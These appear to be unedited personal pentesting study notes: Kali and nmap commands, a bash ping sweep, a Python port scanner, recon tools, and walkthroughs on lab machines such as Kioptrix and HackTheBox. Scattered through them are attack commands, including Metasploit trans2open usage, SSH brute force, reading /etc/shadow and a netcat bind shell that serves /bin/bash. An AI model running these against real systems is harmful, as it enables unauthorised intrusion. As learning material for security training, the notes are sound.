PENTESTING NOTES Hands-on exp.
DISCLAIMER:
- This document contains unedited notes and has not been formally proofread.
- The information provided in this document is intended to provide a basic understanding of certain technologies.
- Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
- Some websites and software may be flagged as malware by antivirus programs.
- The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
- The document is not a substitute for professional advice or expert analysis and should not be used as such.
- The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
- The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
- The author disclaims any liability for any damages or losses that may result from the use of this document or the information contained therein.
- The author reserves the right to update or change the information contained in this document at any time without prior notice.
- Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
- It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
- Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
- It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
- It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
- It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.
REFERENCES:
- https://www.linkedin.com/learning/
- The Cyber mentor Youtube channel
- So You Want to Be a Hacker: 2023 Edition- Heath Adams
- Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
CONTENTS
- PENTEST PHASE STEPS
- INTRODUCTION
- BASIC COMMANDS
- KALI
- Nmap Commands
- Linux commands
- BEGINNER NETWORK PEN TESTING
- Booting Kali
- Building a script
- Executing the python file
- Building script for a scanning (socket) - Scanner.py
- The Five stages of Ethical hacking
- Reconnaissance
- Collection of information Gathering
- Searching sub domains
- Website technologies:
- BURP suite
- Nikto
- Enumeration : Preparation
- Installing Kiptrix
- NMAP scan
- Enumeration : HTTP/HTTPS
- Now trying to run enumeration using nikto - web vulnerability scanner
- Dirbuster / gobuster / dirb
- Enumeration SMB
- Metasploit Framework
- SMBCLIENT
- Enumerating SSH
- Scanning with Nessus
- Exploitation
- Netcat Reverse shell
- Staged Vs Non staged payloads
- Gaining Root with metasploit
- Manual Exploitation
- OPENLUCK exploitation
- Brute Force Attack
- Credential Stuffing and Password spraying
- Pentest Report- revisited
- Building vulnerable machine and attack machine
- HANDS ON EXPERIENCE
- 01 - VULNERABLE MACHINE: HACKTHEBOX [HTB]
- 02 - VULNERABLE MACHINE: ACTIVE DIRECTORY
- 03 - VULNERABLE MACHINE : BLUE
PENTEST PHASE STEPS
- Planning
- Obtain written permission
- Identify rules of engagement
- Set Goals
- Finalize management approval
- Discovery
- Scanning and Enumeration
- Vulnerability analysis
- Exploitation or Attack
- Demonstrate the risk to the organizations
- Business impact
- Gaining access
- Escalation privileges
- System browsing
- Install additional tools
- Determining extent of the vulnerabilities
- Reporting
INTRODUCTION
Pentesting, or penetration testing, is the practice of simulating an attack on a computer system, network, or web application to test its defenses and identify vulnerabilities. There are many resources available to learn pentesting, including online courses, books, and hands-on experience.
Here are some steps you can follow to learn pentesting:
Action Plan
Transitioning to a career in Pentesting may require some additional steps and planning, but it is certainly possible. Here are some steps that you can take:
- Familiarize yourself with the basics of computer science and networking. This can involve taking online courses or reading books to learn about topics such as data structures, algorithms, and network protocols.
- Learn a programming language such as Python, and learn the Linux command line. Both are commonly used in pentesting and are useful for creating custom tools. You can find online tutorials and resources to help you learn them.
- Get hands-on experience by setting up a lab environment and practicing on vulnerable systems. There are many virtual machine images available online that you can use for this purpose.
- Join online communities and forums where you can learn from other pentesters and get feedback on your work.
- Consider obtaining a certification in pentesting, such as the Offensive Security Certified Professional (OSCP) or the Certified Ethical Hacker (CEH). These certifications can help demonstrate your knowledge and skills to potential employers.
- Look for opportunities to gain practical experience, such as internships or part-time positions, to help you build your resume and network.
- Consider seeking out additional education or training, such as a degree in computer science or cybersecurity, to help you stand out in the field.
Hands-on experience
Gaining hands-on experience is an important step in learning about pentesting and becoming proficient in the field. Here are a few ways you can gain hands-on experience:
- Set up a lab environment using virtualization software such as VMware or VirtualBox. This will allow you to create and run virtual machines on your computer, which you can then use to practice on vulnerable systems.
- Download and use virtual machine images that are specifically designed for pentesting. These images often come pre-configured with vulnerable systems and tools that you can use to practice identifying and exploiting vulnerabilities.
- Participate in Capture the Flag (CTF) events and hackathons. These are competitions where teams of participants work to solve challenges and "capture" flags by finding and exploiting vulnerabilities in systems and networks.
- Seek out internships or part-time positions in the field of cybersecurity. These types of opportunities can provide you with practical experience working on real-world systems and projects.
- Search for virtual machine images that are specifically designed for pentesting. These images often come pre-configured with vulnerable systems and tools that you can use to practice identifying and exploiting vulnerabilities.
- Download and install virtualization software such as VMware or VirtualBox. This will allow you to create and run virtual machines on your computer.
- Download a vulnerable virtual machine image and import it into your virtualization software.
- Start the virtual machine and begin practicing on the vulnerable system.
Vulnerable virtual machine images
Platforms for conducting pentesting / ethical hacking:
- HackerOne
- https://www.hackerone.com/
- A platform that connects organizations with a community of hackers who can test their systems and report vulnerabilities
- Bugcrowd
- https://www.bugcrowd.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Synack
- https://www.synack.com/
- A platform that uses a combination of artificial intelligence and a community of vetted hackers to test the security of systems
- Cobalt
- https://cobalt.io/
- A platform that connects organizations with a global community of cybersecurity researchers who can test their systems and report vulnerabilities
- HackenProof
- https://hackenproof.com/
- A platform that connects organizations with a community of hackers who can test their systems and report vulnerabilities
- Tenable
- https://www.tenable.com/
- A platform that offers a range of cybersecurity testing services, including vulnerability assessment and penetration testing
- Intigriti
- https://www.intigriti.com/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Zerocopter
- https://www.zerocopter.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Kaspersky Secure Testing Services
- https://www.kaspersky.com/secure-testing-services
- A range of cybersecurity testing services offered by Kaspersky, including vulnerability assessment and penetration testing
- Veracode
- https://www.veracode.com/
- A platform that offers a range of cybersecurity testing services, including application security testing and secure code review
- Clearview
- https://www.clearviewinfosec.com/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- BugBountyHQ
- https://www.bugbountyhq.com/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Crowdcurity
- https://www.crowdcurity.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Kudelski Security
- https://www.kudelskisecurity.com/services/cybersecurity-testing/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Peerlyst
- https://www.peerlyst.com/
- A platform that connects organizations with a community of cybersecurity experts who can test their systems and report vulnerabilities
- Hacken
- https://hacken.io/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- SafeHat
- https://www.safehats.com/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Alibaba Cloud
- https://www.alibabacloud.com/security/security-testing
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Bounty Factory
- https://www.bountyfactory.io/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Symantec
- https://www.symantec.com/security-center/services/penetration-testing
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Gurucul
- https://www.gurucul.com/services/cybersecurity-services/penetration-testing
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Cybrary
- https://www.cybrary.it/
- A platform that offers free and paid online courses in cybersecurity and IT, including a course on pentesting
- Pentester Academy
- https://www.pentesteracademy.com/
- A platform that offers a range of online courses in cybersecurity, including a course on pentesting
- Hackr.io
- https://hackr.io/
- A platform that aggregates online courses and tutorials in various fields, including cybersecurity
- Udemy
- https://www.udemy.com/
- An online learning platform that offers a range of courses in various fields, including cybersecurity
- edX
- https://www.edx.org/
- An online learning platform that offers a range of courses in various fields, including cybersecurity
**********************************************************************
BASIC COMMANDS
KALI
- Kali prompt: (kali㉿kali)-[~]
- $ route
- $ arp -a
- $ ip n

- Create files
- echo
- cat
- touch
- Updating file
- nano
- gedit
- mousepad
- Service
- sudo service apache2 start
- sudo service apache2 stop
- Start server
- python3 -m http.server 80
- Update && Upgrade
- sudo apt update && sudo apt upgrade   # each command needs its own sudo apt prefix
- git
- git clone https://github.com/Dewalt-arch/pimpmykali
- grep
- cat ip.txt | grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
- Sockets
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET selects the IPv4 address family, SOCK_STREAM selects a TCP stream socket
Nmap Commands
- nmap -sS -D 10.1.0.1 <target-ip>   # -D takes the decoy address list; the target must follow it
- sudo nmap --script vuln <target-ip>
Security Testing: Nmap Security Scanning
- dig www.google.com = gives the IP address
- TCP Scan Types
- sudo nmap -sV -O -F 10.0.2.4
- nmap saving output files
- -v = verbose output, shows the scan progress
How to check a website:
Linux commands
- ls
- cd
- grep
- su
- pwd
- whoami
- mv
- cp
- mkdir
- cat
Tools:
- Nmap
- Nikto
- Zenmap
- Threader3000
- angry IP
- NetCat
- Hydra
- Wireshark
- Dirbuster
- Burp suite
- metasploit
**********************************************************************
BEGINNER NETWORK PEN TESTING
Booting Kali
- Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
root@Kali - # pwd
root@Kali - # ls -la
Update the internal database
root@Kali - # updatedb
root@Kali - # locate filename.txt
Manual command
root@Kali -# man ls
Change the file permission to executable
root@Kali - # chmod +x filename.txt
Adding user
root@Kali - # adduser bob
Command to list the accounts on the system, root and the other users, from /etc/passwd
root@Kali - # cat /etc/passwd
Shadow file: /etc/shadow holds each user's password hash, which is what password-cracking tools work from.
root@Kali - # cat /etc/shadow
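An added example, not from the original notes: a Python audit of the two files just viewed, /etc/passwd and /etc/shadow, that lists extra UID 0 accounts, accounts with an empty password field and locked accounts. The file contents in it are constructed samples, and the hash in them is a placeholder.

```python
# Added example (not from the original notes): parse /etc/passwd and /etc/shadow
# text and flag what an auditor looks for in them: extra UID-0 (root-equivalent)
# accounts and accounts whose password field is empty.
# SAMPLE_PASSWD and SAMPLE_SHADOW are constructed, not from a real host.
from typing import Dict, List, NamedTuple


class PasswdEntry(NamedTuple):
    name: str
    uid: int
    gid: int
    home: str
    shell: str


# passwd fields: name:password-placeholder:uid:gid:gecos:home:shell
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1001:1001:Bob:/home/bob:/bin/bash
backup2:x:0:0:legacy backup:/var/backups:/bin/sh
this line is malformed
"""

# shadow fields: name:hash:lastchange:min:max:warn:inactive:expire:reserved
# "$6$" marks a sha512-crypt hash (the value here is a placeholder),
# "*" or "!" marks a locked account, and an empty field means no password.
SAMPLE_SHADOW = """\
root:$6$SALTSALT$PLACEHOLDERHASH:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
bob::19000:0:99999:7:::
backup2:!:19000:0:99999:7:::
"""


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd lines; lines without 7 fields or a numeric uid are skipped."""
    entries: List[PasswdEntry] = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), home, shell))
    return entries


def parse_shadow(text: str) -> Dict[str, str]:
    """Map account name -> password hash field (may be empty, '*' or '!...')."""
    hashes: Dict[str, str] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        hashes[fields[0]] = fields[1]
    return hashes


def audit_accounts(passwd_text: str, shadow_text: str) -> Dict[str, List[str]]:
    """Findings an auditor pulls from the two files, as lists of account names."""
    entries = parse_passwd(passwd_text)
    hashes = parse_shadow(shadow_text)
    return {
        # any UID 0 besides root is a second root account
        "extra_uid0": [e.name for e in entries if e.uid == 0 and e.name != "root"],
        # empty hash field: login may succeed with no password at all
        "empty_password": [n for n, h in hashes.items() if h == ""],
        # locked accounts carry "!" or "*" instead of a hash
        "locked": [n for n, h in hashes.items() if h.startswith(("!", "*"))],
        # accounts that can open an interactive shell
        "login_shells": [e.name for e in entries
                         if not e.shell.endswith(("nologin", "false"))],
    }


if __name__ == "__main__":
    for finding, names in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW).items():
        print(f"{finding}: {names}")
```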
Switch user
root@Kali - # su username
username@kali - #
Switching back to root
username@kali - # su -
root@Kali
Network Commands
root@Kali - # ifconfig
root@Kali - # iwconfig
Ping with count command
root@Kali - # ping -c 1 192.168.1.1
To view the ARP table, i.e. which MAC address is paired with which IP address on the local network
root@Kali - # arp -a
Show listening ports and active connections
root@Kali - # netstat -ano
root@Kali - # route
root@Kali - # history
Starting Services
root@Kali - # service apache2 start
root@Kali - # service ssh start
root@Kali - # service postgresql start
root@Kali - # service apache2 stop
root@Kali - # systemctl enable ssh
root@Kali - # systemctl enable postgresql
root@Kali : ~ /Desktop# ping -c 1 192.168.1.2 > ip.txt
root@Kali : ~ /Desktop# cat ip.txt
Building a script :
Pulling the replying host's IP address out of the ping output: grep keeps the "64 bytes" reply lines, cut splits each line on the space delimiter (-d " ") and keeps field 4 (the address, which ping prints with a trailing colon), and tr -d ":" deletes that colon.
root@Kali : ~ /Desktop# cat ip.txt | grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
root@Kali : ~ /Desktop# nano ipsweep.sh
Python Cheat sheet;
https://darknetdiaries.com/imgs/Python-CheatSheet.pdf
Creating script
To copy lines out of nano, press Ctrl+Shift+C and paste them into an external editor.
(root㉿kali) nano ipsweep.sh
GNU nano 7.2 ipsweep.sh
#!/bin/bash
# Usage: ./ipsweep.sh 192.168.1   (first three octets; the script appends .1 to .254)
if [ "$1" == "" ]
then
    echo "You forgot an ip address"
    echo "The Syntax ./ipsweep.sh 192.168.1"
else
    for ip in $(seq 1 254); do
        # one ping per host, backgrounded with & so all 254 probes overlap; print only the IPs that replied
        ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
    done
fi
********************
Executing the bash script
Now running the script
root㉿kali# ./ipsweep.sh 192.168.1 > iplist.txt
doing nmap scan with the obtained ip and using it from the stored file.
root㉿kali # for ip in $(cat iplist.txt); do nmap -p 80 -T4 $ip & done
root㉿kali # gedit python101.py
#!/bin/python3
#print string
print("strings and things:")
print('hello world')
print("""hello,this is
a multi line string""")
print('\n') #new line
#math
print('math time')
print(50 + 50) #add
print('\n') #new line
#variables and methods
quote = "All is fun"
print(len(quote))
print(quote.upper()) #the parentheses call the method; without them Python prints the method object itself
name = "Health"
age = 29
gpa = 3.9
print(int(age))
print("my name is " + name + " i am " + str(age) + " yrs")
print('\n') #new line
#functions
print("some fun")
def who_am_i():
    name = "Health"
    age = 29
    print("my name is " + name + " i am " + str(age) + " yrs")
who_am_i()
#adding parameters
def add_one_hundred(num):
    print(num + 100)
add_one_hundred(100)
#boolean parameters
#relational and boolean operators
#conditional statements
print("conditional statements")
def soda(money):
    if money >= 2:
        return "U have got a soda"
    else:
        return "No soda"
print(soda(3))
print(soda(1))
print('\n') #new line
#Lists
print("Lists")
movies = ["one","two","three","four"]
print(movies[0])
#Tuples
#looping
print("for loops")
veg = ["cucu","carr","app"]
for x in veg:
    print(x)
print("while loop runs while the condition is true")
i = 1
while i < 10:
    print(i)
    i += 1
********************
Executing the python file
Giving execute permission
root㉿kali # chmod +x python101.py
root㉿kali # python3 python101.py
root㉿kali # - gedit py102.py
#!/bin/python3
#importing
print("importing")
import sys #system functions and parameters
from datetime import datetime
print(datetime.now())
from datetime import datetime as dt #importing with an alias
print(dt.now())
def new_line():
    print('\n')
new_line()
#advance strings
print("advance strings")
my_name = "Health"
print(my_name[0]) #first initial
sentence = "this is a sentence"
print(sentence[:4]) #first word
#Dictionaries
print("Dictionaries are with key and value")
********************
Executing the python file
root㉿kali- python3 py102.py
if you want to host a simple server then
root㉿kali-# python3 -m http.server 80
root㉿kali-# pip3 install pyftpdlib   # Python FTP server library, for hosting a simple FTP server
Building script for a scanning (socket) - Scanner.py
#!/bin/python3
import sys #allows command line arguments
import socket
from datetime import datetime
#define our target
if len(sys.argv) == 2:
    target = socket.gethostbyname(sys.argv[1]) #translate a hostname to IPv4
else:
    print("invalid amount of arguments")
    print("syntax: python3 scanner.py <ip>")
    sys.exit()
#add a pretty banner
print("-" * 50)
print("Scanning target " + target)
print("Time started: " + str(datetime.now()))
print("-" * 50)
socket.setdefaulttimeout(1) #seconds (a float); set before creating sockets so every connect attempt times out
try:
    for port in range(50, 85):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        result = s.connect_ex((target, port)) #returns 0 on success, otherwise an error indicator
        print("Checking port {}".format(port))
        if result == 0:
            print("Port {} is open".format(port))
        s.close()
except KeyboardInterrupt: #the exception is spelled KeyboardInterrupt (capital K and I)
    print("\nExiting program.")
    sys.exit()
except socket.gaierror:
    print("Hostname could not be resolved.")
    sys.exit()
except socket.error:
    print("Couldn't connect to server.")
    sys.exit()
*****
root㉿kali-# python3 scanner.py 192.168.1.1
The Five stages of Ethical hacking
- Reconnaissance
- Active & passive
- Scanning & Enumeration
- Nmap, Nessus, Nikto, etc.
- Gaining Access
- exploitation
- Maintaining Access
- Covering Tracks
Reconnaissance
Passive
- Location information
- Job information
- Web/ Host
- Target validation
- WHOIS, nslookup, dnsrecon
- Finding subdomains
- Google FU, dig, nmap, Sublist3r, Bluto, crt.sh
- Fingerprinting
- nmap, wappalyzer, whatweb, builtwith, netcat
- Data Breaches
- haveibeenpwned, breach-parse, weleakinfo
BUG-Crowd programs
- https://bugcrowd.com/programs
- example : tesla.com
Here are a few places where you can find bug bounty programs:
Bugcrowd (https://www.bugcrowd.com/): Bugcrowd is another platform that connects security researchers with organizations that offer bug bounty programs. Many companies in industries such as finance, healthcare, and technology use Bugcrowd to run their bug bounty programs.
Open Bug Bounty (https://www.openbugbounty.org/): Open Bug Bounty is a non-profit organization that aims to make the internet a safer place by encouraging website owners to run a public bug bounty program. The organization provides a platform for security researchers to report vulnerabilities they find in participating websites.
BountyFactory (https://bountyfactory.io/): BountyFactory is a platform that aggregates bug bounty programs from various companies, making it easy for security researchers to find and participate in programs.
Synack (https://www.synack.com/): Synack is a company that provides managed crowdsourced security testing services to organizations. Security researchers can apply to become part of Synack's "Red Team" and participate in private bug bounty programs for Synack's clients.
Collection of information Gathering
Discovering email address:
Checking email id are valid
Hunting Breached Credential's
- $ sudo apt install sublist3r
- sublist3r -d tesla.com
- https://crt.sh/
- Searching tesla.com
- https://github.com/OWASP/Amass
- The OWASP Amass Project has developed a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery using open source information gathering and active reconnaissance techniques.
- https://github.com/tomnomnom/httprobe
- Take a list of domains and probe for working http and https servers.
Website technologies:
- https://builtwith.com/
[Screenshot: builtwith.com]
- Wappalyzer:
- Find out what websites are built with https://www.wappalyzer.com
- The Wappalyzer APIs provide instant access to website technology stacks, company and contact details, social media profiles, email verification and more
[Screenshot: Wappalyzer]
- WhatWeb Usage Example
- ─$ whatweb tesla.com
https://www.kali.org/tools/theharvester/
- root㉿kali-# theHarvester -h
- root㉿kali-# theHarvester -d apple.com -l 500 -b bing
BURP suite
- Community edition
- https://portswigger.net/burp/releases/professional-community-2023-1-2requestededition=community&requestedplatform=
- Setting up Burp suite
- opening the burpsuite
- next opening the Firefox, hamburger menu, settings, network settings
- manual proxy configuration
- http proxy : 127.0.0.1 Port:8080
- same for https proxy & SOCKS host
- New tab - https://burp/
[Screenshot: Burp Suite]
- download the CA certificate and save
- Go to settings- Privacy & Security - click view certificate - import - select the file - click the 2 check boxes and ok
- Open the Burp suite- Proxy tab - click intercept on.
- then open browser - tesla.com
- Burp Suite / Proxy tab - captures the request
- Burp Suite / Target tab
[Screenshot: Burp Suite]
Nikto
- root@kali:~# nikto -h https://tesla.com
GOOGLE FU
search query examples
- site:tesla.com # here you are searching against the site
- site:tesla.com -www # removing "WWW"
- site:tesla.com -www -ir # removing both "www" and "ir"
- site:tesla.com filetype:pdf
Social Media:
Enumeration : Preparation
Installing Kioptrix
- Original source
- https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
- Modified version
- https://tcm-sec.com/kioptrix
- https://drive.google.com/drive/folders/1z923e0icfJADbhgS0Qfaxuez-GJTWvjt
- Setting all the virtualbox machine under "NATNETWORK"
Kioptrix vul machine is turned on
Kioptrix_Level_1.
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
# arp-scan -l
ifconfig
Scanning Starts
root@kali:~# netdiscover -r 192.168.1.0/24
- Getting the kioptrix ip address to perform attack
NMAP scan
- root@kali:~# nmap -T4 -p- 192.168.202.130
- nmap -sU -T4 192.168.202.130   # UDP scan; -p expects a port list, not the target address
Now after getting the open port details
- root@kali:~# nmap -A -T4 -p22,80,111,139,443,32768 192.168.202.130
- Port 22 is open SSH service
- Port 80 open Apache httpd 1.3.20
- Port 139 open netbios-ssn samba
- Port 443 open ssl/https apache/1.3.20
Enumeration : HTTP/HTTPS
Now 192.168.202.130 is opened in the browser
- An Apache test page is displayed as below [Kioptrix vulnerable machine]
Now creating report
Take screenshot and provide details
For IP address 192.168.202.130
[Screenshot: open port disclosure]
Now clicking on the manual link leads to a 404
- the 404 page reveals the Apache version, the server name and the port number; all of this is internal information that is being exposed.
[Screenshot: Information disclosure - 404 page]
Now trying to run enumeration using nikto - web vulnerability scanner
- root@kali:~# nikto -h 192.168.202.130
- also try: nikto -h http://192.168.202.130
[Screenshot: nikto]
- read the scan report to see which vulnerabilities the scan results list:
- anti-clickjacking not present
- x-xss protection header not defined
- apache outdated
- mod_ssl outdated
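An added example, not code from the original notes or from nikto: a Python checker that parses a raw HTTP response and reports the header findings nikto lists above, plus the Server header version leak that the `curl --head` note later in these notes records. The two responses in it are constructed samples, not captures from the Kioptrix machine.

```python
# Added example (not from the original notes): audit HTTP response headers for
# the findings nikto and `curl --head` report in this walkthrough.
# RAW_VULNERABLE and RAW_HARDENED are constructed samples, not real captures.
import re
from typing import Dict, List, Tuple

RAW_VULNERABLE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sat, 01 Jan 2000 00:00:00 GMT\r\n"
    "Server: Apache/1.3.20 (Unix)\r\n"      # version string leaks (constructed)
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>Test Page</body></html>"
)

RAW_HARDENED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"                    # product name only, no version
    "X-Frame-Options: DENY\r\n"
    "Content-Security-Policy: frame-ancestors 'none'\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 0\r\n"               # defined, disabled; CSP does the job
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>Test Page</body></html>"
)


def parse_response(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP response into (status line, header map).

    Header names are lower-cased; a repeated header keeps its last value.
    Lines without a colon are skipped instead of raising, so a partly
    garbled capture still yields the headers that did parse.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = lines[0]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return status, headers


def audit_headers(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (finding id, explanation) pairs for the checks in the notes."""
    findings: List[Tuple[str, str]] = []

    # Server header info disclosure (low): "/<digit>" means a version leaked.
    server = headers.get("server", "")
    if re.search(r"/\d", server):
        findings.append(("server-version-disclosure",
                         "Server header reveals software version: %r" % server))

    # Anti-clickjacking: need X-Frame-Options or a CSP frame-ancestors directive.
    csp = headers.get("content-security-policy", "")
    if "x-frame-options" not in headers and "frame-ancestors" not in csp:
        findings.append(("anti-clickjacking-missing",
                         "No X-Frame-Options header and no CSP frame-ancestors"))

    # X-XSS-Protection: nikto flags its absence; modern browsers ignore it,
    # so the control that matters is a Content-Security-Policy.
    if "x-xss-protection" not in headers:
        findings.append(("x-xss-protection-missing",
                         "X-XSS-Protection not defined (legacy check; use CSP)"))

    # MIME sniffing: X-Content-Type-Options must be exactly "nosniff".
    if headers.get("x-content-type-options", "").lower() != "nosniff":
        findings.append(("nosniff-missing",
                         "X-Content-Type-Options: nosniff not set"))
    return findings


def audit_raw(raw: str) -> List[str]:
    """Finding ids for a raw response, sorted for stable reporting."""
    _, headers = parse_response(raw)
    return sorted(fid for fid, _ in audit_headers(headers))


if __name__ == "__main__":
    for label, raw in (("vulnerable", RAW_VULNERABLE), ("hardened", RAW_HARDENED)):
        print(label, audit_raw(raw) or "no findings")
```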
Dirbuster / gobuster / dirb
kali ~# dirbuster &
[Screenshot: DirBuster]
The Dirbuster window opens up
- Target url http://192.168.202.130:80/
- File with list of dirs/files: Browse - click up- usr/ share/wordlists/dirbuster/
- Select any file - for time being use- directory-list-lowercase-2-3-small.txt
- File extension : php,asa,sql,zip,tar,pdf,txt,bak - add what more file extensions need to be searched.
- file extensions are selected based on the base server is on php
[Screenshot: DirBuster window]
[Screenshot: internal host]
- checking the comments for keys, passwords, hints, dir structure or any other information useful for gaining access in the source code
[Screenshot: DirBuster result]
[Screenshot: usage_201911.html]
Enumeration SMB
Now trying to enumerate SMB on port 139
Metasploit Framework is started
msf5> search smb
[Screenshot: msfconsole search smb]
SMBCLIENT is started
root@kali:~# smbclient -L \\\\192.168.57.134\\
Enumerating SSH
We have not got the password and hence terminating - CTRL + C
Researching potential vulnerabilities
Pentest Report - Notes- https://www.exploit-db.com/exploits/764
- https://github.com/heltonWernik/OpenLuck
Apache 1.3.20 vulnerabilities
Results received: -- https://www.exploit-db.com/exploits/19975
- https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-369927/Apache-Http-Server-1.3.20.html
Samba 2.2.1 vulnerabilities
- https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open/
- Module Options
- To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
- msf > use exploit/linux/samba/trans2open
- msf exploit(trans2open) > show targets
- ...targets...
- msf exploit(trans2open) > set TARGET < target-id >
- msf exploit(trans2open) > show options
- ...show and set options...
- msf exploit(trans2open) > exploit
Now using Kali we can search the exploit
kali:~# searchsploit samba 2.2
kali:~# searchsploit mod ssl 2
[Screenshot: Assessment Report]
Scanning with Nessus
Downloading the package
SCAN results - analysis
Exploitation
Netcat Reverse shell - uses internal n/w
Netcat Bind shell - uses external n/w
- From Victim machine 4445 is opened:
- From attacker machine :
msf5 exploit(linux/samba/trans2open) > options
Manual Exploitation
OPENLUCK exploitation
Brute Force Attack
ssh - brute force attack
msf5 auxiliary(scanner/ssh/ssh_login)> set threads 10
msf5 auxiliary(scanner/ssh/ssh_login)> run
Credential Stuffing and Password spraying
FoxyProxy Standard
Now in intruder tab -> Positions Tab -> click clear button.
Payload set 1 -> Paste username
Password Spraying :
Pentest Report- revisited
Building vulnerable machine and attack machine.
Downloading ISO image from Microsoft for Virtual Box
windows-10-enterprise
windows-server-2016
Vulnserver
Immunity Debugger
Buffer overflow
Steps to conduct a Buffer overflow
- Spiking
- Fuzzing
- Finding the offset
- Overwriting the EIP
- Finding Bad Characters
- Finding Right Modules
- Generating shellcode
Spiking
- Starting Vulnserver with admin access.
- Starting Immunity debugger with admin access - File -> attach -> Vulnserver; Then click run
- Finding ip address = 10.0.2.5
Starting Kali linux machine
FUZZING
Finding the Offset
Overwriting the EIP
Finding the Right Module
Generating Shellcode and Gaining Root
01 - VULNERABLE MACHINE: HACKTHEBOX [HTB]
Taking any active machine
Scanning for the ip address of the HTB
nmap -sU -T4 10.10.10.133 # this is a UDP scan
nmap -T4 -p- 10.10.10.133 # this is a TCP scan of all ports
Inference: when the results show 22/tcp and 80/tcp open, look for some sort of exploit that leads to credentials; those credentials will then allow a login on port 22.
Also chance for getting remote exploitation on port 80
Pasting on the browser 10.10.10.133 leads to openpage
Viewing page source
Page source information show - http://onetwoseven.htb:60080
Changing localDNS, such that the page can be accessed when visiting http://onetwoseven.htb:60080
root@kali:~# gedit /etc/hosts
Adding the ip address and http://onetwoseven.htb:60080
Now entering http://onetwoseven.htb
root@kali:~# nikto -h onetwoseven.htb
Results - server apache 2.4.5
Server leaks via etags
root@kali:~# sftp ots-5MmY2Y@onetwoseven.htb
Now, after entering the password, access is gained
sftp> ls
sftp> get index.html
root@kali:~# cat index.html
Based on the information getting into the url http://onetwoseven.htb/dist/img
root@kali:~# gedit index.html
Changing the image to donkey-ddos-jpg
sftp> put index.html
Recheck the url , now donkey image is displayed
root@kali:~# dirbuster
Target url 192.168.202.130
File with list of dirs/files: Browse - click up- usr/ share/wordlists/dirbuster/
Select any file - for time being use- directory-list-lowercase-2-3-small.txt
File extension : php,asa,sql,zip,tar,pdf,txt,bak - add what more file extensions need to be searched.
Exploitation, Shells, Credential stuffing
Netcat Reverse shell
Target machine to Attackbox
Netcat Bind shell
Attackbox connected to Target machine
From Victim machine 4445 is opened:
root@kali:~# nc -lvp 4445 -e /bin/bash
From attacker machine :
root@kali:~# nc 192.168.202.129 4445
Connection is established and able to connect to the shell
Apache 1.3.20 vulnerabilities
- root@kali:~# curl --head 192.168.202.130
- Now taking a note
- Server header info disclosure(low)
- 192.168.202.130 : Copy IP address and paste screenshot
- Default 404 info disclosure (low)
